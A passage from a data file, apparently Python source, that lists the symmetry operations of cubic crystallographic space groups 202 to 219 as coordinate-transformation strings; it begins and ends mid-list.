'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x'],
202: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', '-x,-y+1/2,-z+1/2',
'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2',
'z,x+1/2,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2',
'y,z+1/2,-x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2',
'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2', '-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2',
'z+1/2,-x,y+1/2', '-y+1/2,-z,-x+1/2', 'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y', 'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y',
'-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x', 'y+1/2,z+1/2,-x'],
203: ['x,y,z', '-x+3/4,-y+3/4,z', '-x+3/4,y,-z+3/4', 'x,-y+3/4,-z+3/4', 'z,x,y', 'z,-x+3/4,-y+3/4',
'-z+3/4,-x+3/4,y', '-z+3/4,x,-y+3/4', 'y,z,x', '-y+3/4,z,-x+3/4', 'y,-z+3/4,-x+3/4', '-y+3/4,-z+3/4,x',
'-x,-y,-z', 'x+1/4,y+1/4,-z', 'x+1/4,-y,z+1/4', '-x,y+1/4,z+1/4', '-z,-x,-y', '-z,x+1/4,y+1/4',
'z+1/4,x+1/4,-y', 'z+1/4,-x,y+1/4', '-y,-z,-x', 'y+1/4,-z,x+1/4', '-y,z+1/4,x+1/4', 'y+1/4,z+1/4,-x',
'x,y+1/2,z+1/2', '-x+3/4,-y+1/4,z+1/2', '-x+3/4,y+1/2,-z+1/4', 'x,-y+1/4,-z+1/4', 'z,x+1/2,y+1/2',
'z,-x+1/4,-y+1/4', '-z+3/4,-x+1/4,y+1/2', '-z+3/4,x+1/2,-y+1/4', 'y,z+1/2,x+1/2', '-y+3/4,z+1/2,-x+1/4',
'y,-z+1/4,-x+1/4', '-y+3/4,-z+1/4,x+1/2', '-x,-y+1/2,-z+1/2', 'x+1/4,y+3/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4',
'-x,y+3/4,z+3/4', '-z,-x+1/2,-y+1/2', '-z,x+3/4,y+3/4', 'z+1/4,x+3/4,-y+1/2', 'z+1/4,-x+1/2,y+3/4',
'-y,-z+1/2,-x+1/2', 'y+1/4,-z+1/2,x+3/4', '-y,z+3/4,x+3/4', 'y+1/4,z+3/4,-x+1/2', 'x+1/2,y,z+1/2',
'-x+1/4,-y+3/4,z+1/2', '-x+1/4,y,-z+1/4', 'x+1/2,-y+3/4,-z+1/4', 'z+1/2,x,y+1/2', 'z+1/2,-x+3/4,-y+1/4',
'-z+1/4,-x+3/4,y+1/2', '-z+1/4,x,-y+1/4', 'y+1/2,z,x+1/2', '-y+1/4,z,-x+1/4', 'y+1/2,-z+3/4,-x+1/4',
'-y+1/4,-z+3/4,x+1/2', '-x+1/2,-y,-z+1/2', 'x+3/4,y+1/4,-z+1/2', 'x+3/4,-y,z+3/4', '-x+1/2,y+1/4,z+3/4',
'-z+1/2,-x,-y+1/2', '-z+1/2,x+1/4,y+3/4', 'z+3/4,x+1/4,-y+1/2', 'z+3/4,-x,y+3/4', '-y+1/2,-z,-x+1/2',
'y+3/4,-z,x+3/4', '-y+1/2,z+1/4,x+3/4', 'y+3/4,z+1/4,-x+1/2', 'x+1/2,y+1/2,z', '-x+1/4,-y+1/4,z',
'-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+1/4,-z+3/4', 'z+1/2,x+1/2,y', 'z+1/2,-x+1/4,-y+3/4', '-z+1/4,-x+1/4,y',
'-z+1/4,x+1/2,-y+3/4', 'y+1/2,z+1/2,x', '-y+1/4,z+1/2,-x+3/4', 'y+1/2,-z+1/4,-x+3/4', '-y+1/4,-z+1/4,x',
'-x+1/2,-y+1/2,-z', 'x+3/4,y+3/4,-z', 'x+3/4,-y+1/2,z+1/4', '-x+1/2,y+3/4,z+1/4', '-z+1/2,-x+1/2,-y',
'-z+1/2,x+3/4,y+1/4', 'z+3/4,x+3/4,-y', 'z+3/4,-x+1/2,y+1/4', '-y+1/2,-z+1/2,-x', 'y+3/4,-z+1/2,x+1/4',
'-y+1/2,z+3/4,x+1/4', 'y+3/4,z+3/4,-x'],
204: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y', 'z,-x,y',
'-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', '-x+1/2,-y+1/2,-z+1/2', 'x+1/2,y+1/2,-z+1/2',
'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z+1/2,x+1/2,y+1/2',
'z+1/2,x+1/2,-y+1/2', 'z+1/2,-x+1/2,y+1/2', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z+1/2,x+1/2',
'-y+1/2,z+1/2,x+1/2', 'y+1/2,z+1/2,-x+1/2'],
205: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'-x,-y,-z', 'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y',
'z+1/2,x,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2'],
206: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'-x,-y,-z', 'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y',
'z+1/2,x,-y+1/2', 'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z,x,y+1/2',
'z,x+1/2,-y', 'z+1/2,-x,y', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z,x', '-y,z,x+1/2', 'y,z+1/2,-x'],
207: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x'],
208: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2'],
209: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y,x+1/2,-z+1/2',
'-y,-x+1/2,-z+1/2', 'y,-x+1/2,z+1/2', '-y,x+1/2,z+1/2', 'x,z+1/2,-y+1/2', '-x,z+1/2,y+1/2',
'-x,-z+1/2,-y+1/2', 'x,-z+1/2,y+1/2', 'z,y+1/2,-x+1/2', 'z,-y+1/2,x+1/2', '-z,y+1/2,x+1/2',
'-z,-y+1/2,-x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,-z+1/2', '-y+1/2,-x,-z+1/2',
'y+1/2,-x,z+1/2', '-y+1/2,x,z+1/2', 'x+1/2,z,-y+1/2', '-x+1/2,z,y+1/2', '-x+1/2,-z,-y+1/2',
'x+1/2,-z,y+1/2', 'z+1/2,y,-x+1/2', 'z+1/2,-y,x+1/2', '-z+1/2,y,x+1/2', '-z+1/2,-y,-x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', 'y+1/2,-x+1/2,z',
'-y+1/2,x+1/2,z', 'x+1/2,z+1/2,-y', '-x+1/2,z+1/2,y', '-x+1/2,-z+1/2,-y', 'x+1/2,-z+1/2,y',
'z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,x', '-z+1/2,y+1/2,x', '-z+1/2,-y+1/2,-x'],
210: ['x,y,z', '-x,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z', 'x+1/2,-y,-z+1/2', 'z,x,y', 'z+1/2,-x,-y+1/2',
'-z,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y', 'y,z,x', '-y+1/2,z+1/2,-x', 'y+1/2,-z,-x+1/2', '-y,-z+1/2,x+1/2',
'y+3/4,x+1/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+1/4,-x+3/4,z+3/4', '-y+3/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+3/4', '-x+3/4,z+3/4,y+1/4', '-x+1/4,-z+1/4,-y+1/4', 'x+1/4,-z+3/4,y+3/4',
'z+3/4,y+1/4,-x+3/4', 'z+1/4,-y+3/4,x+3/4', '-z+3/4,y+3/4,x+1/4', '-z+1/4,-y+1/4,-x+1/4',
'x,y+1/2,z+1/2', '-x,-y,z', '-x+1/2,y,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y',
'-z,-x,y', '-z+1/2,x,-y+1/2', 'y,z+1/2,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z+1/2,-x', '-y,-z,x',
'y+3/4,x+3/4,-z+1/4', '-y+1/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+3/4,z+3/4,-y+1/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+1/4',
'z+3/4,y+3/4,-x+1/4', 'z+1/4,-y+1/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+3/4,-x+3/4',
'x+1/2,y,z+1/2', '-x+1/2,-y+1/2,z', '-x,y+1/2,-z+1/2', 'x,-y,-z', 'z+1/2,x,y+1/2', 'z,-x,-y',
'-z+1/2,-x+1/2,y', '-z,x+1/2,-y+1/2', 'y+1/2,z,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z,-x', '-y+1/2,-z+1/2,x',
'y+1/4,x+1/4,-z+1/4', '-y+3/4,-x+1/4,-z+3/4', 'y+3/4,-x+3/4,z+1/4', '-y+1/4,x+3/4,z+3/4',
'x+1/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+3/4', '-x+3/4,-z+1/4,-y+3/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+1/4,-x+1/4', 'z+3/4,-y+3/4,x+1/4', '-z+1/4,y+3/4,x+3/4', '-z+3/4,-y+1/4,-x+3/4',
'x+1/2,y+1/2,z', '-x+1/2,-y,z+1/2', '-x,y,-z', 'x,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x,y+1/2', '-z,x,-y', 'y+1/2,z+1/2,x', '-y,z,-x', 'y,-z+1/2,-x+1/2', '-y+1/2,-z,x+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+3/4,-x+3/4,-z+1/4', 'y+3/4,-x+1/4,z+3/4', '-y+1/4,x+1/4,z+1/4',
'x+1/4,z+3/4,-y+3/4', '-x+1/4,z+1/4,y+1/4', '-x+3/4,-z+3/4,-y+1/4', 'x+3/4,-z+1/4,y+3/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+1/4,x+3/4', '-z+1/4,y+1/4,x+1/4', '-z+3/4,-y+3/4,-x+1/4'],
211: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2',
'y+1/2,-x+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2',
'-x+1/2,-z+1/2,-y+1/2', 'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2',
'-z+1/2,y+1/2,x+1/2', '-z+1/2,-y+1/2,-x+1/2'],
212: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4'],
213: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4'],
214: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4'],
215: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x'],
216: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y,x+1/2,z+1/2',
'-y,-x+1/2,z+1/2', 'y,-x+1/2,-z+1/2', '-y,x+1/2,-z+1/2', 'x,z+1/2,y+1/2', '-x,z+1/2,-y+1/2',
'-x,-z+1/2,y+1/2', 'x,-z+1/2,-y+1/2', 'z,y+1/2,x+1/2', 'z,-y+1/2,-x+1/2', '-z,y+1/2,-x+1/2',
'-z,-y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
'-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,z+1/2', '-y+1/2,-x,z+1/2',
'y+1/2,-x,-z+1/2', '-y+1/2,x,-z+1/2', 'x+1/2,z,y+1/2', '-x+1/2,z,-y+1/2', '-x+1/2,-z,y+1/2',
'x+1/2,-z,-y+1/2', 'z+1/2,y,x+1/2', 'z+1/2,-y,-x+1/2', '-z+1/2,y,-x+1/2', '-z+1/2,-y,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,z', '-y+1/2,-x+1/2,z', 'y+1/2,-x+1/2,-z',
'-y+1/2,x+1/2,-z', 'x+1/2,z+1/2,y', '-x+1/2,z+1/2,-y', '-x+1/2,-z+1/2,y', 'x+1/2,-z+1/2,-y',
'z+1/2,y+1/2,x', 'z+1/2,-y+1/2,-x', '-z+1/2,y+1/2,-x', '-z+1/2,-y+1/2,x'],
217: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,z', '-y,-x,z', 'y,-x,-z', '-y,x,-z', 'x,z,y', '-x,z,-y', '-x,-z,y', 'x,-z,-y',
'z,y,x', 'z,-y,-x', '-z,y,-x', '-z,-y,x', 'x+1/2,y+1/2,z+1/2', '-x+1/2,-y+1/2,z+1/2',
'-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z+1/2,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z+1/2,-x+1/2',
'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2',
'y+1/2,-x+1/2,-z+1/2', '-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2',
'-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2',
'-z+1/2,y+1/2,-x+1/2', '-z+1/2,-y+1/2,x+1/2'],
218: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2', '-z+1/2,y+1/2,-x+1/2',
'-z+1/2,-y+1/2,x+1/2'],
219: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,z+1/2', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,-x+1/2,-z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'z+1/2,y+1/2,x+1/2', 'z+1/2,-y+1/2,-x+1/2', '-z+1/2,y+1/2,-x+1/2',
'-z+1/2,-y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2',
'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2',
'-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y+1/2,x,z', '-y+1/2,-x,z', 'y+1/2,-x,-z',
'-y+1/2,x,-z', 'x+1/2,z,y', '-x+1/2,z,-y', '-x+1/2,-z,y', 'x+1/2,-z,-y', 'z+1/2,y,x', 'z+1/2,-y,-x',
'-z+1/2,y,-x', '-z+1/2,-y,x', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2', 'x+1/2,-y,-z+1/2',
'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2', 'y+1/2,z,x+1/2',
